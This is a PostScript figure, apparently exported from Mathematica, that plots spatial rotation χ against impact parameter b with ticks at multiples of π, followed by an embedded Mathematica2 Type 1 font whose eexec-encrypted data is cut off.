0 setdash +P +P +1 g +[ ] 0 setdash +p +0 setlinecap +78.19 2.952 m +78.19 5.849 L +s +P +p +0 setlinecap +92.764 2.952 m +92.764 4.69 L +s +P +p +0 setlinecap +107.338 2.952 m +107.338 4.69 L +s +P +p +0 setlinecap +121.911 2.952 m +121.911 4.69 L +s +P +p +0 setlinecap +136.485 2.952 m +136.485 4.69 L +s +P +p +0 setlinecap +151.058 2.952 m +151.058 5.849 L +s +P +p +0 setlinecap +165.632 2.952 m +165.632 4.69 L +s +P +p +0 setlinecap +180.205 2.952 m +180.205 4.69 L +s +P +p +0 setlinecap +194.779 2.952 m +194.779 4.69 L +s +P +p +0 setlinecap +209.353 2.952 m +209.353 4.69 L +s +P +p +0 setlinecap +223.926 2.952 m +223.926 5.849 L +s +P +p +0 setlinecap +238.5 2.952 m +238.5 4.69 L +s +P +p +0 setlinecap +253.073 2.952 m +253.073 4.69 L +s +P +p +0 setlinecap +267.647 2.952 m +267.647 4.69 L +s +P +p +0 setlinecap +282.22 2.952 m +282.22 4.69 L +s +P +p +0 setlinecap +296.794 2.952 m +296.794 5.849 L +s +P +p +0 setlinecap +311.367 2.952 m +311.367 4.69 L +s +P +p +0 setlinecap +325.941 2.952 m +325.941 4.69 L +s +P +p +0 setlinecap +340.515 2.952 m +340.515 4.69 L +s +P +p +0 setlinecap +355.088 2.952 m +355.088 4.69 L +s +P +p +0 setlinecap +369.662 2.952 m +369.662 5.849 L +s +P +p +0 setlinecap +384.235 2.952 m +384.235 4.69 L +s +P +p +0 setlinecap +398.809 2.952 m +398.809 4.69 L +s +P +p +0 setlinecap +413.382 2.952 m +413.382 4.69 L +s +P +p +0 setlinecap +427.956 2.952 m +427.956 4.69 L +s +P +p +0 setlinecap +442.53 2.952 m +442.53 5.849 L +s +P +p +0 setlinecap +450.12 210.041 m +447.223 210.041 L +s +P +p +np 451 203 m +451 217 L +459 217 L +459 203 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 452.28 203.666 ] concat +1 w +[ ] 0 setdash +p +np -2.28 -1.666 m +-2.28 14.334 L +7.72 14.334 L +7.72 -1.666 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +1 g +0 10.5 m +(0) N +P +[1 0 0 1 -452.28 -203.666 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +450.12 157.941 m +447.223 157.941 L +s +P +p +np 451 151 m +451 165 L +460 165 L +460 151 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 452.28 151.566 ] concat +1 w +[ ] 0 setdash +p +np -2.28 -1.566 m +-2.28 14.434 L +8.72 14.434 L +8.72 -1.566 L +cp +clip np +11.52 /Mathematica1 Msf +1 g +0.75 10.5 m +(p) N +P +[1 0 0 1 -452.28 -151.566 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +450.12 105.842 m +447.223 105.842 L +s +P +p +np 451 98 m +451 113 L +468 113 L +468 98 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 452.28 99.467 ] concat +1 w +[ ] 0 setdash +p +np -2.28 -2.467 m +-2.28 14.533 L +16.72 14.533 L +16.72 -2.467 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +1 g +0 10.5 m +(2) N +11.52 /Mathematica1 Msf +9 10.5 m +(p) N +P +[1 0 0 1 -452.28 -99.467 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +450.12 53.742 m +447.223 53.742 L +s +P +p +np 451 46 m +451 61 L +468 61 L +468 46 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 452.28 47.367 ] concat +1 w +[ ] 0 setdash +p +np -2.28 -2.367 m +-2.28 14.633 L +16.72 14.633 L +16.72 -2.367 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +1 g +0 10.5 m +(3) N +11.52 /Mathematica1 Msf +9 10.5 m +(p) N +P +[1 0 0 1 -452.28 -47.367 ] concat +1 w +[ ] 0 setdash +P +P +p +np 210 257 m +210 272 L +310 272 L +310 257 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 211.235 257.578 ] concat +1 w +[ ] 0 setdash +p +np -2.235 -1.578 m +-2.235 15.422 L +99.765 15.422 L +99.765 -1.578 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +10.08 /Times-Roman-MISO Msf +p +0 9 m +(I) N +P +p +3.75 9 m +(m) N +P +p +12.75 9 m +(p) N +P +p +19.5 9 m +(a) N +P +p +24.75 9 m +(c) N +P +p +30 9 m +(t) N +P +p +36.75 9 m +(p) N +P +p +43.5 9 m +(a) N +P +p +48.75 9 m +(r) N +P +p +53.25 9 m +(a) N +P +p +58.5 9 m +(m) N +P +p +67.5 9 m +(e) N +P +p +72.75 9 m +(t) N +P +p +76.5 9 m +(e) N +P +p +81.75 9 m +(r) N +P +86.25 9 m +(,) N +92.25 9 m +(b) N +P +[1 0 0 1 -211.235 -257.578 ] concat +1 w +[ ] 0 setdash +P +P +p +np 34 75 m +34 165 L +49 165 L +49 75 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[0 -1 1 0 35.28 164.105 ] concat +1 w +[ ] 0 setdash +p +np -1.895 -2.28 m +-1.895 14.72 L +90.105 14.72 L +90.105 -2.28 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +10.08 /Times-Roman-MISO Msf +p +0 9 m +(S) N +P +p +6 9 m +(p) N +P +p +12.75 9 m +(a) N +P +p +18 9 m +(t) N +P +p +21.75 9 m +(i) N +P +p +24.75 9 m +(a) N +P +p +30 9 m +(l) N +P +p +36 9 m +(r) N +P +p +40.5 9 m +(o) N +P +p +46.5 9 m +(t) N +P +p +50.25 9 m +(a) N +P +p +55.5 9 m +(t) N +P +p +59.25 9 m +(i) N +P +p +62.25 9 m +(o) N +P +p +68.25 9 m +(n) N +P +75 9 m +(,) N +10.08 /Mathematica1 Msf +81.75 9 m +(c) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +10.08 /Times-Roman-MISO Msf +P +[0 1 -1 0 164.105 -35.28 ] concat +1 w +[ ] 0 setdash +P +P +p +np 70 3 m +70 238 L +450 238 L +450 3 L +cp +clip np +p +np 117 136 m +117 152 L +155 152 L +155 136 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 118.485 136.705 ] concat +1 w +[ ] 0 setdash +p +np -2.485 -1.705 m +-2.485 16.295 L +37.515 16.295 L +37.515 -1.705 L +cp +clip np +p +np -0.485 0.295 m +-0.485 13.295 L +35.515 13.295 L +35.515 0.295 L +cp +clip np +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +p +np -2.485 -1.705 m +-2.485 15.295 L +37.515 15.295 L +37.515 -1.705 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +%%BeginResource: font Mathematica2 +%%BeginFont: Mathematica2 +%!PS-AdobeFont-1.0: Mathematica2 001.000 +%%CreationDate: 8/28/01 at 12:01 AM +%%VMusage: 1024 29061 +% Mathematica typeface design by Andre Kuzniarek. Copyright \(c\) 1996-2001 Wolfram Research, Inc. [http://www.wolfram.com]. All rights reserved. [Font version 2.00] +% ADL: 800 200 0 +%%EndComments +FontDirectory/Mathematica2 known{/Mathematica2 findfont dup/UniqueID known{dup +/UniqueID get 5095653 eq exch/FontType get 1 eq and}{pop false}ifelse +{save true}{false}ifelse}{false}ifelse +20 dict begin +/FontInfo 16 dict dup begin + /version (001.000) readonly def + /FullName (Mathematica2) readonly def + /FamilyName (Mathematica2) readonly def + /Weight (Medium) readonly def + /ItalicAngle 0 def + /isFixedPitch false def + /UnderlinePosition -133 def + /UnderlineThickness 20 def + /Notice (Mathematica typeface design by Andre Kuzniarek. Copyright \(c\) 1996-2001 Wolfram Research, Inc. [http://www.wolfram.com]. All rights reserved. [Font version 2.00]) readonly def + /em 1000 def + /ascent 800 def + /descent 200 def +end readonly def +/FontName /Mathematica2 def +/Encoding 256 array +dup 0/NUL put +dup 1/Eth put +dup 2/eth put +dup 3/Lslash put +dup 4/lslash put +dup 5/Scaron put +dup 6/scaron put +dup 7/Yacute put +dup 8/yacute put +dup 9/HT put +dup 10/LF put +dup 11/Thorn put +dup 12/thorn put +dup 13/CR put +dup 14/Zcaron put +dup 15/zcaron put +dup 16/DLE put +dup 17/DC1 put +dup 18/DC2 put +dup 19/DC3 put +dup 20/DC4 put +dup 21/onehalf put +dup 22/onequarter put +dup 23/onesuperior put +dup 24/threequarters put +dup 25/threesuperior put +dup 26/twosuperior put +dup 27/brokenbar put +dup 28/minus put +dup 29/multiply put +dup 30/RS put +dup 31/US put +dup 32/Space put +dup 33/Radical1Extens put +dup 34/Radical2 put +dup 35/Radical2Extens put +dup 36/Radical3 put +dup 37/Radical3Extens put +dup 38/Radical4 put +dup 39/Radical4Extens put +dup 40/Radical5 put +dup 41/Radical5VertExtens put +dup 42/Radical5Top put +dup 43/Radical5Extens put +dup 44/FixedFreeRadical1 put +dup 45/FixedFreeRadical2 put +dup 46/FixedFreeRadical3 put +dup 47/FixedFreeRadical4 put +dup 48/TexRad1 put +dup 49/TexRad2 put +dup 50/TexRad3 put +dup 51/TexRad4 put +dup 52/TexRad5 put +dup 53/TexRad5VertExt put +dup 54/TexRad5Top put +dup 55/TexRadExtens put +dup 56/LBrace1 put +dup 57/LBrace2 put +dup 58/LBrace3 put +dup 59/LBrace4 put +dup 60/RBrace1 put +dup 61/RBrace2 put +dup 62/RBrace3 put +dup 63/RBrace4 put +dup 64/LBracket1 put +dup 65/LBracket2 put +dup 66/LBracket3 put +dup 67/LBracket4 put +dup 68/RBracket1 put +dup 69/RBracket2 put +dup 70/RBracket3 put +dup 71/RBracket4 put +dup 72/LParen1 put +dup 73/LParen2 put +dup 74/LParen3 put +dup 75/LParen4 put +dup 76/RParen1 put +dup 77/RParen2 put +dup 78/RParen3 put +dup 79/RParen4 put +dup 80/DblLBracket1 put +dup 81/DblLBracket2 put +dup 82/DblLBracket3 put +dup 83/DblLBracket4 put +dup 84/DblRBracket1 put +dup 85/DblRBracket2 put +dup 86/DblRBracket3 put +dup 87/DblRBracket4 put +dup 88/LAngleBracket1 put +dup 89/LAngleBracket2 put +dup 90/LAngleBracket3 put +dup 91/LAngleBracket4 put +dup 92/RAngleBracket1 put +dup 93/RAngleBracket2 put +dup 94/RAngleBracket3 put +dup 95/RAngleBracket4 put +dup 96/LCeiling1 put +dup 97/LCeiling2 put +dup 98/LCeiling3 put +dup 99/LCeiling4 put +dup 100/LFloor1 put +dup 101/LFloor2 put +dup 102/LFloor3 put +dup 103/LFloor4 put +dup 104/LFlrClngExtens put +dup 105/LParenTop put +dup 106/LParenExtens put +dup 107/LParenBottom put +dup 108/LBraceTop put +dup 109/LBraceMiddle put +dup 110/LBraceBottom put +dup 111/BraceExtens put +dup 112/RCeiling1 put +dup 113/RCeiling2 put +dup 114/RCeiling3 put +dup 115/RCeiling4 put +dup 116/RFloor1 put +dup 117/RFloor2 put +dup 118/RFloor3 put +dup 119/RFloor4 put +dup 120/RFlrClngExtens put +dup 121/RParenTop put +dup 122/RParenExtens put +dup 123/RParenBottom put +dup 124/RBraceTop put +dup 125/RBraceMiddle put +dup 126/RBraceBottom put +dup 127/DEL put +dup 128/LBracketTop put +dup 129/LBracketExtens put +dup 130/LBracketBottom put +dup 131/RBracketTop put +dup 132/RBracketExtens put +dup 133/RBracketBottom put +dup 134/DblLBracketBottom put +dup 135/DblLBracketExtens put +dup 136/DblLBracketTop put +dup 137/DblRBracketBottom put +dup 138/DblRBracketExtens put +dup 139/DblRBracketTop put +dup 140/LeftHook put +dup 141/HookExt put +dup 142/RightHook put +dup 143/Radical1 put +dup 144/Slash1 put +dup 145/Slash2 put +dup 146/Slash3 put +dup 147/Slash4 put +dup 148/BackSlash1 put +dup 149/BackSlash2 put +dup 150/BackSlash3 put +dup 151/BackSlash4 put +dup 152/ContourIntegral put +dup 153/DblContInteg put +dup 154/CntrClckwContInteg put +dup 155/ClckwContInteg put +dup 156/SquareContInteg put +dup 157/UnionPlus put +dup 158/SquareIntersection put +dup 159/SquareUnion put +dup 160/LBracketBar1 put +dup 161/LBracketBar2 put +dup 162/LBracketBar3 put +dup 163/LBracketBar4 put +dup 164/RBracketBar1 put +dup 165/RBracketBar2 put +dup 166/RBracketBar3 put +dup 167/RBracketBar4 put +dup 168/ContourIntegral2 put +dup 169/DblContInteg2 put +dup 170/CntrClckwContInteg2 put +dup 171/ClckwContInteg2 put +dup 172/SquareContInteg2 put +dup 173/UnionPlus2 put +dup 174/SquareIntersection2 put +dup 175/SquareUnion2 put +dup 176/DblLBracketBar1 put +dup 177/DblLBracketBar2 put +dup 178/DblLBracketBar3 put +dup 179/DblLBracketBar4 put +dup 180/DblRBracketBar1 put +dup 181/DblRBracketBar2 put +dup 182/DblRBracketBar3 put +dup 183/DblRBracketBar4 put +dup 184/ContourIntegral3 put +dup 185/DblContInteg3 put +dup 186/CntrClckwContInteg3 put +dup 187/ClckwContInteg3 put +dup 188/SquareContInteg3 put +dup 189/UnionPlus3 put +dup 190/SquareIntersection3 put +dup 191/SquareUnion3 put +dup 192/DblBar1 put +dup 193/DblBar2 put +dup 194/DblBar3 put +dup 195/DblBar4 put +dup 196/BarExt put +dup 197/DblBarExt put +dup 198/OverCircle put +dup 199/Hacek put +dup 200/VertBar1 put +dup 201/VertBar2 put +dup 202/Nbspace put +dup 203/VertBar3 put +dup 204/VertBar4 put +dup 205/FIntegral put +dup 206/FIntegral2 put +dup 207/FIntegral3 put +dup 208/OverDoubleDot put +dup 209/OverTripleDot put +dup 210/OverLVector put +dup 211/OverRVector put +dup 212/OverLRVector put +dup 213/OverLArrow put +dup 214/OverArrowVectExt put +dup 215/OverRArrow put +dup 216/OverLRArrow put +dup 217/Integral put +dup 218/Summation put +dup 219/Product put +dup 220/Intersection put +dup 221/Union put +dup 222/LogicalOr put +dup 223/LogicalAnd put +dup 224/Integral1 put +dup 225/Integral2 put +dup 226/Sum1 put +dup 227/Sum2 put +dup 228/Product1 put +dup 229/Product2 put +dup 230/Union1 put +dup 231/Union2 put +dup 232/Intersect1 put +dup 233/Intersect2 put +dup 234/Or1 put +dup 235/Or2 put +dup 236/And1 put +dup 237/And2 put +dup 238/SmallVee put +dup 239/SmallWedge put +dup 240/DoubleGrave put +dup 241/Breve put +dup 242/DownBreve put +dup 243/OverTilde put +dup 244/Tilde2 put +dup 245/Tilde3 put +dup 246/Tilde4 put +dup 247/BackQuote put +dup 248/DblBackQuote put +dup 249/Quote put +dup 250/DblQuote put +dup 251/VertBar put +dup 252/DblVertBar put +dup 253/VertBarExten put +dup 254/DblVertBarExten put +dup 255/Coproduct put + readonly def +/PaintType 0 def +/FontType 1 def +/StrokeWidth 0 def +/FontMatrix[0.001 0 0 0.001 0 0]readonly def +/UniqueID 5095653 def +/FontBBox{-13 -4075 2499 2436}readonly def +currentdict end +currentfile eexec +D8061D93A8246509E76A3EC656E953B7C22E43117F5A3BC2421790057C314DAE3EFBFF49F45DD7CD +91B890E4155C4895C5126A36B01A58FDB2004471266DA05A0931953736AD8B3DEB3BCB2A24BC816A +C1C90A1577C96B9096D6F51F9E21E625ADF6C3A49867A632A605C117E6325C820121799F412E226B +EFE61F2813676F172CBD7EC10FF1EFBB92DF3A88E9378921BBD00E6024CC08EF057CECD09B824E0A +CCDAA4644296DE34D19D779A21C30666026829D38FB35A2284CAED23C8B913E7B28BB3DA7C8CE390 +4C0BAE30B0287680CCCAB2E6D4CAB2E7D786ABF54068028FD7D94FAC236094761B62B7E76F68D2BE +58C23AF85001950EFC1A9C1BB71520B78DDF6AA0058D25D041E86D01878DF56A5C48D74DCB2BBD68 +D75C94A3CE878484D28049331CE3D4364B40FAA2C754E8F443D244C5BC44B1C7868E36EAF4F7EF1F +6CB81E6CF63FABD65C29A991EB7D724DA06535AE43F3D0E2D04F6113B493C15463B4CEBFB72AB879 +7E4645F9CC0BB17E02A9626BEA4B4259F798B53B18DF2ACCF2B86BF2209CF0265DE0A46869333F98 +CCF70BF2C9239A0ABD2E97923AA5695BAFEA31E27B8F532BAA45F2980A11D069265A5312A260A627 +A765C4A08897E5C500990AE6FDA4CD6D575905468417297380EB6400CB2CF001C4B8EB79811CD8D7 +C173A337922B99DAB1048D5D03C78F78F36FEE31673D8C5FF8AD689A63AEA055CA705DB47D3AF965 +73571985E62F63866018C96EC4CA7E735C9294D8C81C03806D23CB87C0C08F86F5FA68CFC9AE48F6 +958AE016DCE4D60EB64AEAAD59D8A2592BC398BCA479FBC2F0C20C3E7F730481494C88781A6A9E0E +4F47A94619A3841FAC76A4FB252EB6FB43628AE1A4944539B1DFF672940AA5E93FFACFAC04624EF6 +7ED9C691788F0004DB7FFD1C995F2C52C0042F02F5C789F85D9E51716F3B4EDB21D4B9E660E4A892 +B747201EEC6DD6A8881FA3039664061094D1892108A2AD068D7F0251BFA72D874ECB2F42D27CC343 +052156F6A3A66D2CA6DAEF046A433FD54FEB4410315690971D0F43363EC0119B21F4BE3DFDC8C28D +BF5D68F145D3AC932EE62C32DFDEB1C48C2455392193268C893093BF911645986607DD13D8285895 +1854A7FF81FC98ADD44742907818B3C8E3187371BD9FE6EF5B4315E82C359BF2EA91D2894EE7FD9A +734BF2745D7FE8D08D29DA2A03176C992E11F1AADCE219D5E33F325BCFF4521D6D04E61B913B6C41 +740AF8BD9EA83F3AE7C4E5402366A812B1724431EE78D2028317B975E91941B591CC6C97740C453C +C7D7AB3CE97AE2F4DFAB6B9C8810A52A276BEAABD687BDA0971EE623A40B7AD6A8E69ED8BE63959D +3DCF8799E2505AC7F7B0E2FFECB0B08027A6266B7F96311B0AD78B7B6C78392AA062A73FDF179FEC +7F748929D060289F899FE417D4028FF332204FE04146BB130EF05FB57AF4BF9337EF71094DC5922E +3EF2D6A9F8257AF242019C349B65C2A3972ACA842D14EAB6A8D287456C9D7D295198F4AB7632EE43 +7D006B8124A80BBF26C1B902379D7F90080B51F982630E27B6031CE20930C273EA5D7FF0FC7E996E +67B072796CD96A7739444D21FE10DE7B57D143E4155EEE1B89F32EBCBF4C64D6D3FA1C46E06C9E9F +F99BC9BBCC61A400C7DBF812C42AAED863FE9EE3B02E731D1809F3CAB941252DE486BFE641F60F60 +C788F68519A6B04A4D6F50F02F93C6B8774B960C1FE893373D2AC2D865C487CFFE7669E1F1E73630 +7D34C15835F0453C8B0C1AE352CE1F27065F1082E6C84F86330F76B39C246315D6996AB69F81A020 +30D92CCB4C2A5AA4F4B3CAC88B2C8C9C621294A5EAB6AC3778DB99BD2F411735DC1421861417B4FD +399B365AEA45185A3D9D687546E36BB73994FB7FA3EE890AE3734BD9381B0E7AE514E8C517B87268 +7364C38D0A8379039F33336799205F2F54BBF7C2E9B30B27BCFB9FF2CD64F5D700F2455EE66B6252 +6E79ED2B0E5FF9732281CA50D27A93F259B6D4B5C7F856BB7D4F2E0F7741FA2419BBAF86C372E34D +59BC7AABC4CEF4F47EE40E118AB95A4863E16C55824D34002D59844D1F51B5DC6FB6BB5D595C4404 +1E05A84FD453A129279F894D726F6CD53BA3E234518324C5F715DAE6E7B5695326FC0C9B6CA2B53D +B25EC76BE9662388058629E70DC7BD861E188F1FF32A754A455195163CB4754D116D24E6A6300B67 +1862625E260442DEA2505E36D5F7AA4AD1FEB3B42632E382959C7E84569B2A790A0D0A208C2D4816 +AD28046B42C7A4797D424277AD9425C04DB87DCF112AE431CFFF6E4FFA979E947502AE5E1755C112 +0AE2361888B956F3F513A5975680E6E8374D8BF26C32AADC826D729E9026B14A68BC3D065E11C697 +D4D474CF963AFE083DD7D9278A0C27447E25AD70DD40B2EBAB8040164E11CD75AE3125C29806DEF4 +AD1B989F7001E227685DEF6EBE3287DE43BBA5FE2123A0EC835AECF879C13F7CFDC409901F291E89 +06C26E42B189862AFAE029F03D86D35E44E318FE16537E2B73E4F39F1E6945A3A6432438DCB6D2B2 +09814B5228D08165568617C279499ECA1B88C90300F1C88C45D4BE3DC726A59E24B46C5B2FF228C6 +E6645819C6F1D5B05737BE7353F4787EE52A21DC47A44F3C44406E79BBFDDC164682B02F4C39300D +12EF37A58E317FC1B8CE58E04BE666ED5DA75DBF752BEDDA4C7491E4D6922BCCA9CF421CE6751002 +8638EF643119841F423626D6B19A5D2CFB193B093D7646913F64614C098E5F5FF9422EBA75FA9AA8 +4F8ED114AEAB011E6F0727FB96F26BECBBAFE3AA8D0ABC5A8E9906B6CBB9E03F8CC4FCA97C884B83 +7CC33C619CD3195C55633B72D3F2D45561CD226F42B859B8099812D591886FA851107A185169FA7C +944248DE28642FA3043FF3B60236BFD781257C6FE4D56174AD16ABBF9659C05F08673A70496A0787 +C187D4367CB0CF48BD9A4FE0E481273E4909A1092626A13917DCBDE920028B06E094F5B28887B990 +32521E1720B75EB284AA6FFE53FA5CD5B903F951FCF7B33CC981FE7BCC4BDF4907ACC3AA60B69969 +A9AF204C84EC8C0F5DCB8A85E39EA9F2D4B67095A44CA0C8B072D7A61F3015D502B1A0F660C22221 +3231986D5E8C04AECBAFE999D1735A80051C06CA279D0FF6215633FB7A706454DA7236DB17AD72EE +1F6044A26A0EB77AB3BCE823E3F5E0DD31ACB029A1D17665FF16E5D1ACDDFD83CAEE1D48666D7BC6 +DADC34D317C335855D118892CBD32412F5870C3D2E599A46AA997A5E2BBDD3001C2957D81345DBED +583B72C4FB356F0C872A31A35087775EF18601930C0874EEA1ACB3ED3690EF447926439CC383087C +C9D5C6EB21EDF5941CB4E99FDA434A91676D76DC1A1BD801EECA6B0A88370B7005D41A1253CF8217 +1285986DC302B51123DBA9733BDEF0361AE0580FE6FBA5F29CF1438801586559D7436436CFE33E6A +D6EFA850BB8C9382E1A068246F370388186DC278F31F770C2C96881AC6E40823B24D6D536514A2C7 +AF3D159621080442592CAC03D6967BCBDB38FCA1A45F76F1A10027F1DCC076533C6AFC097FBCF0DA +A0078BE0828247F938AF76A87EFC14D9F5444CBCDCE637E2325D86B9D99D1ED70F44194E19F6C7A9 +9E415DC8A6E484DAAE52AAC1307A5353E8F649A35214B3F43DB5F3DB3ED06580A570E60B3E52679F +F90A3B00D4EB4DFBCF0D2F9C5545A6DE10BCC849A0BA9E18F29C6F09ED0F0DD48AD37B7925654433 +A6D02965A3813BA2EAB2E6C2004ADD216DAE99471EE518BD0DA0F534F1512A8E26286B07FEDE71E6 +0A5A057A22AEF095A8B4752F54C04CB8BC170F3D6B725B83A6780176194B21BA906E37B7923E2548 +604F8DB18E0A3E1B5FF04D00898C29C6033DAC54637CF5B068291559D8526D5201F3503FBA4EE12D +D7A6CF6271618F41FE08384521CD771FA80364D747430A071EE3D3ABDB5400DD36A0285430D537FA +F6EF8ACAF85C250D6652F327B2BD3B29E1C64E6E66C788FF1D9C3AC6DD38691CDECD0F3FF4079BAD +A2BC0CBE14AA3FCC38E3F31B3298A6995C87B34A7245ABA2C968F908D8337860507569C370654635 +570615F987531551414B5CCAF7F4D0B38F701619C553E746BD90655294270560046A925A021C98F9 +3EA8FF5B5B8A0D05AD483E6DDC5257635308C6C0FE9182D0E4FB011A00981A7B95DB5BF5A82F8B1E +B68E8822F8B1B7CF01AF11302B44307F3A71D5EB3465F793CAEB1E72D2C63E3D264380A75FF1DDA5 +00B5F82B04179EA9DAC10731FDEDF5913EFDEDDF5799D2A86EF2D16C0B52D99FCEAD392E9226AA6D +3D11D29054130C8602F703CB1EBDAAA089A02C0EBD53343A7B297836CB63E4B2C33C8760ECEB15E5 +6B59D4B296B8B724244D37651C3CB862C7135D62B2692F5A27B9374C5C3C5399E5C4DCCD76572294 +F742B1F545B736BF4C82D8F4E2941CD52C0B944261DD4CCF8A968B646662F3D187557206FF165F3C +0D3D5CA1E428D61D7936E1D00C5377A047EE80E0A5612F7FDEBB8B224270ED23A031A049E8676516 +BF66EBAFCF3F9D4975B0F212FB7A914EE45640972B61AE8E60E602DC7C20758BC07A159B08862F16 +6302D8CBEF03C4B0C73BD8504EB5B14DBC64FBDDC867FE51F76099769A7BD4FA4CF4096EAAAFD55F +9A20F6D4B84D8FD139112A43204026F15F9FF5AB6729537CCDA60369C24D7EFF4B6B971EBF0BD277 +A9AD1BF1066508A0A7DD9A8D45447A39B92D6B0F7DA4BEC2689D25F35C8C490891F053F90DEE5E2D +8C9D7FD1E23D0F1C5F57921BDB13BC9B8C3CED4FC42C4DDBF0706985A0DDABCC683FF5EA8416C225 +ABD219024432E3972C3314C30A672FD21523C83D93B2AC8D1DF023EEB1BD74E825FCD19873E63A45 +F6935E6685CF5EF472191B976F9EED2A4765E1B21B46EE1C4CB90AE89DA48E52BC4EDBAC2C855A67 +CB0BE9160F3126151CD171081192D0D6CB27E4EB2D725F31AE95FB283149F53F22BD8E414354D4BB +56724057601FE4BF34A5B188C00B0E550639CD796CC66EF895AA5315BEAD49B5639EF0878CDF2CA4 +271027678693EA212D0C11A6EA52F748AD0F62A0336BEC8497EE933EEC461E461CCD2F5291B980E2 +8B7D66690B10EEBE22B092179396EEF5D00E42E6CB73BAD4485F2063AEA6B6207E136ABB925332C2 +60F12D8B60B211A9BB15F37F42F53AC2559F5A8397DDD491D314B6DB0B50E41F0AA0A42FFDD5B9F3 +FBD8EFB7E343C06F793DA6BBEE4FAAFB233C31EAA3AD701B1F1C4F2FB05A7647439D19CC856C7D98 +EB3375B3ED2255FA33D9ACB87C1937E0B7F34C9B299C8D2A7F85D41141C598F9505C72B5AC2DE9BD +E24CDAE1DEE416786B93D4EE713E437D2C4A3251A296B785C81A8232F98ADD04B3D2B41394F8BDEA +7B602A555EDBD51A088C2277D8E86B08A0D05CB6142E33E973BB3F2CE841D323ABE6FBBF83B84272 +220F569DE23264AB672C2590D4527A29510E7F289DC2193E66FF23D83703E27E9E81572E7534B1DA +510BB846576E8A39D9CF44483F297C92317ED8E46237B3D73844B3B19D37831B44EC116CBAC3F75B +B67928C4D4E741EC95E96FAD74D852220F4F1A8FDCD273E0F6E77F09EFD5723CCA1398A021FAE947 +9CAC5922DAC8E2F46704BC216C7BCC1575A455CCE2C2A080B9FDCD0758D9D921EEB6DF96C64A31D1 +C9BEA80F48461857ED7DB635A3BABB3BB6155E835E605B09E06A2AAF6BF3EA70B8C0E098CD1A818E +30B9A4AADC284EE2B87E945B717FA73AFF5FB788E51827F6FBE319ADDD059614B493ECCE718789A2 +EB0F117EC811EC38A3F4EDEACA660612BD247425A3FB2E6022CC14FDF69B6660B37FCD4359F1BA54 +D12B1F478D76CF898824762C25A026B01C94752F6F3724C31AE788CFE992D9CA152902EEBC4AD8B7 +A5F0E68A5A0408A2F0BA71CE0D94B4A905B35F2781D7E7A2712DC62E87518BFE72A5BC4A9F36A4B3 +B1494B0C4C14705203762E0CD0B28BE31234449C7655B5D6165D7CC4A16431F7A8ECA58D25711E98 +4FF2CE123C05AF9A65D478B73739715DE62A199D47BAC65785EE1DD25AF91868F91D037C0AD754BA +CE3DC4B67F1FDCA8FD9FA39796EFA9C975DBFAA99DB70624B3563408D0048E3AAC6B4F228DC0AC08 +B9C2B63657EEDB53B46D157426A3B4B4B8CC5B4F30BC24CF9BED442DB51F3C7A0656DFBEFA401E1E +0823065499C69D51C477360FD13ACA8896A8117789C4561F3D85F3A80D18E39F1D6BF76C7876922A +1038ADAFD53F2D092369B356D0CA3FE6A27D7B9BD3985C78424C21E60F6BB46408013DFD7A30D320 +EAD9AC6E5FD36655AC6706666A76F1E426640C4B0BE692E4879991EA9EDF4596C0DDF43D4E370360 +D91E8B2839D368DA2A910AA6092337E2E20DEECF43D583CF164881079ED5A492B5EFCC1CAF91512E +0FEA8140CA3E2553733D6F743728ACAC3E643394015967DAC8839D5A804503A45DBC539FB8656D75 +2F00EECF73E7EC8746CB13F438CAFD554C01150048F758573903B0B3260AEDD78BC2EE87D201E219 +486315A4C01D95DAAB54335A4F2CAFC3F43F12A9574CD2DECCBC1858406C701EE62C281A55B729DC +EBBE74FDFF275A0A7B8B22C7490187D1839F4FF271723C140095F28221C4145C9061F9A5B3EDF8D2 +9E0DA04D9A8AF6ECD42DB897DD5C9318D636FAB698554BD9EF9B0902BFD8C96CB958773A3C4A5FCE +8A334C673206C39277E45AB50DA2661F89D621AF057CF1A7ECDE344DC7658514B4C655937E7BE010 +B0694B069FF64D5582E3A4B7F6AF6C96D056ABB20CC883AB25A9BEABB18A84F0258CA3E4F33FFB77 +9841F5970DB447969FE9C6BFDB066ACBC040648D74F553EE434BADC353450A3792EEF9CFDB2FBCD6 +07153F2EF73C1BCCE3784609F26C80193BAEF766E7CC7C33A4CAB862E6E01FC1CDF11E2FBF25FE1D +308CFF9CD924893861BABF78F762F3CADD3E0BEB38F6157CD08F1B8767606427C4A631AFC9488E6D +4D1A8F4B51ED48582BCD3089BE037ECFF18DF6175EC317EA56D4FDE37288F089532C13F7B3C1EF7D 